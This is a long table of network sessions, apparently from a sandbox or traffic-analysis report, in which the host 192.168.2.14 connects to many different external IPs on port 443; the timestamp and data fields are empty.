                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12207192.168.2.143412071.145.155.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12208192.168.2.1451124103.16.178.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12209192.168.2.144980441.232.42.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12210192.168.2.1441624128.68.209.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12211192.168.2.1435314107.213.0.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12212192.168.2.1456052104.174.83.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12213192.168.2.1438042191.78.77.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12214192.168.2.1457040211.222.107.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12215192.168.2.1459916115.166.172.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12216192.168.2.144974486.56.98.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12217192.168.2.1436146165.141.63.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12218192.168.2.145159872.114.203.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12219192.168.2.1458326180.13.114.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12220192.168.2.14416461.155.241.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12221192.168.2.144951276.104.69.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12222192.168.2.145087657.71.148.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12223192.168.2.14363328.180.106.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12224192.168.2.1457280105.202.130.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12225192.168.2.1441912181.91.173.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12226192.168.2.1433370103.253.57.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12227192.168.2.145584675.249.126.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12228192.168.2.145164692.96.192.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12229192.168.2.146050867.168.154.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12230192.168.2.1440574183.254.107.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12231192.168.2.144771414.199.200.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12232192.168.2.1459460129.79.94.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12233192.168.2.1449738105.5.248.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12234192.168.2.144624898.251.118.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12235192.168.2.1456134124.145.240.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12236192.168.2.1433766173.113.105.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12237192.168.2.1433666187.163.132.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12238192.168.2.1446006115.218.40.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12239192.168.2.145329627.57.117.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12240192.168.2.143698614.57.254.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12241192.168.2.144277650.163.71.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12242192.168.2.1442898135.145.249.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12243192.168.2.1458968167.113.236.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12244192.168.2.143515831.13.191.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12245192.168.2.1441702210.196.148.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12246192.168.2.1453166218.174.103.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12247192.168.2.145418419.78.107.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12248192.168.2.144793080.23.91.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12249192.168.2.1447946183.19.63.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12250192.168.2.1436478172.175.194.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12251192.168.2.144157665.193.58.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12252192.168.2.145609284.118.163.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12253192.168.2.144573860.63.153.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12254192.168.2.1443570164.172.118.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12255192.168.2.1459196113.32.32.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12256192.168.2.143411296.180.141.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12257192.168.2.1444996103.143.3.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12258192.168.2.1457994116.56.105.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12259192.168.2.144290686.162.30.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12260192.168.2.1453658170.119.135.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12261192.168.2.143542440.139.168.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12262192.168.2.1445026124.141.41.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12263192.168.2.1451616168.99.133.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12264192.168.2.144602083.155.173.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12265192.168.2.1442796135.66.135.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12266192.168.2.144975688.173.192.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12267192.168.2.143518291.147.190.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12268192.168.2.1445908100.1.54.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12269192.168.2.1451848144.248.192.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12270192.168.2.1434534143.39.78.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12271192.168.2.1449402113.247.182.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12272192.168.2.1458026182.121.251.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12273192.168.2.145237450.40.41.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12274192.168.2.144028817.71.102.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12275192.168.2.146036258.102.61.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12276192.168.2.1438670146.225.187.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12277192.168.2.1438312139.149.1.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12278192.168.2.1443222130.204.26.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12279192.168.2.143322018.175.213.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12280192.168.2.1443186197.70.232.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12281192.168.2.1449558108.213.239.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12282192.168.2.1437040204.78.232.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12283192.168.2.145128849.89.165.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12284192.168.2.1433930110.239.188.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12285192.168.2.1460532202.173.84.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12286192.168.2.144893641.72.100.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12287192.168.2.1453634121.2.146.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12288192.168.2.145009839.228.34.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12289192.168.2.1458538202.65.48.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12290192.168.2.1454216212.62.226.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12291192.168.2.143961064.128.223.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12292192.168.2.1460936173.81.105.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12293192.168.2.1435272178.56.111.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12294192.168.2.1441142212.39.233.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12295192.168.2.1449416186.77.175.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12296192.168.2.1445304117.95.27.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12297192.168.2.1436702201.43.150.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12298192.168.2.144602857.253.164.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12299192.168.2.1450422103.158.16.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12300192.168.2.1452634222.240.229.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12301192.168.2.1453948109.118.180.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12302192.168.2.1447922112.168.241.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12303192.168.2.1437334119.176.201.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12304192.168.2.1449372164.220.14.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12305192.168.2.1444538196.204.245.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12306192.168.2.144996872.46.208.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12307192.168.2.143747020.224.28.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12308192.168.2.14591949.71.148.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12309192.168.2.1444946166.119.211.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12310192.168.2.144708639.225.32.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12311192.168.2.1452058166.199.118.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12312192.168.2.143851866.218.127.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12313192.168.2.146044014.122.73.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12314192.168.2.1457580144.76.229.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12315192.168.2.1445206203.240.249.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12316192.168.2.1439038218.131.204.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12317192.168.2.1454208202.119.88.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12318192.168.2.144958267.119.240.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12319192.168.2.1441980129.131.142.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12320192.168.2.1456372131.184.191.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12321192.168.2.145887280.182.167.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12322192.168.2.1450634181.243.62.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12323192.168.2.1435780164.23.197.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12324192.168.2.14331185.126.26.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12325192.168.2.1442818162.140.49.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12326192.168.2.144484825.145.171.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12327192.168.2.1434558192.139.235.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12328192.168.2.1452508136.85.83.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12329192.168.2.14399068.155.255.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12330192.168.2.1438218104.222.19.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12331192.168.2.1456180182.73.203.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12332192.168.2.144400427.90.53.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12333192.168.2.1452134180.169.20.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12334192.168.2.143280227.240.241.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12335192.168.2.1439066222.15.103.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12336192.168.2.1454840210.144.72.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12337192.168.2.144382472.15.250.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12338192.168.2.143943431.234.116.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12339192.168.2.1450888160.243.177.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12340192.168.2.1434974221.153.200.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12341192.168.2.1433592178.195.223.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12342192.168.2.1435524161.252.189.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12343192.168.2.1459506162.227.72.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12344192.168.2.1453554195.32.255.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12345192.168.2.1449654201.29.55.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12346192.168.2.144684061.208.36.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12347192.168.2.1445728101.21.232.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12348192.168.2.1446890145.146.218.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12349192.168.2.145795854.197.7.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12350192.168.2.1457616220.55.65.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12351192.168.2.144663463.177.126.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12352192.168.2.1458896161.61.206.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12353192.168.2.144571418.24.2.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12354192.168.2.1441508134.146.111.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12355192.168.2.1450880113.228.187.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12356192.168.2.1446648221.94.74.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12357192.168.2.143873645.179.21.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12358192.168.2.1445622190.171.252.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12359192.168.2.143402423.62.213.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12360192.168.2.144492619.124.89.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12361192.168.2.1455256220.122.72.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12362192.168.2.143950088.155.25.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12363192.168.2.143680294.117.176.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12364192.168.2.1456368172.183.100.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12365192.168.2.1435648113.41.96.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12366192.168.2.1458368201.218.38.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12367192.168.2.1449696173.3.31.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12368192.168.2.1456432190.8.59.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12369192.168.2.1448308135.148.170.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12370192.168.2.1441328217.133.182.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12371192.168.2.143409857.121.196.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12372192.168.2.144032685.55.38.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12373192.168.2.1454566205.141.113.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12374192.168.2.1434644105.47.219.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12375192.168.2.1453816138.217.85.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12376192.168.2.143292240.235.97.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12377192.168.2.1459744187.80.227.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12378192.168.2.143910092.104.227.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12379192.168.2.1442534144.196.132.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12380192.168.2.1458142143.100.170.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12381192.168.2.1438304208.107.242.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12382192.168.2.1453196204.242.149.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12383192.168.2.145261662.24.192.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12384192.168.2.1456392174.78.187.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12385192.168.2.1452950203.203.159.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12386192.168.2.144889418.73.128.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12387192.168.2.144708634.43.90.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12388192.168.2.144565088.122.77.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12389192.168.2.1443254147.247.12.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12390192.168.2.1459160131.177.96.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12391192.168.2.143385260.27.66.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12392192.168.2.1451266171.107.106.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12393192.168.2.144241298.247.218.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12394192.168.2.1448906163.9.21.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12395192.168.2.145957847.11.141.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12396192.168.2.144250477.75.121.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12397192.168.2.1436502169.54.2.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12398192.168.2.145108443.82.186.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12399192.168.2.1452660184.111.235.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12400192.168.2.145479227.224.67.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12401192.168.2.1456284177.43.179.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12402192.168.2.145883493.41.125.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12403192.168.2.1459124184.32.52.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12404192.168.2.1439648119.246.11.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12405192.168.2.1457772112.110.0.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12406192.168.2.14388605.102.223.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12407192.168.2.1437662222.173.111.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12408192.168.2.1456574149.186.180.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12409192.168.2.1434110156.90.238.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12410192.168.2.1444990157.155.202.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12411192.168.2.1441104222.230.27.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12412192.168.2.145323227.167.44.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12413192.168.2.1443724183.209.32.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12414192.168.2.1443126181.7.85.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12415192.168.2.143441013.137.99.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12416192.168.2.1433860124.196.122.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12417192.168.2.145740665.195.154.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12418192.168.2.1454644208.131.218.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12419192.168.2.1434028159.209.106.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12420192.168.2.1433484182.188.145.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12421192.168.2.1442216150.186.206.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12422192.168.2.144443054.140.233.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12423192.168.2.145173279.176.68.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12424192.168.2.145950083.167.79.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12425192.168.2.144855681.78.148.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12426192.168.2.146097052.199.216.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12427192.168.2.1445176204.211.59.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12428192.168.2.1452280184.230.112.19443
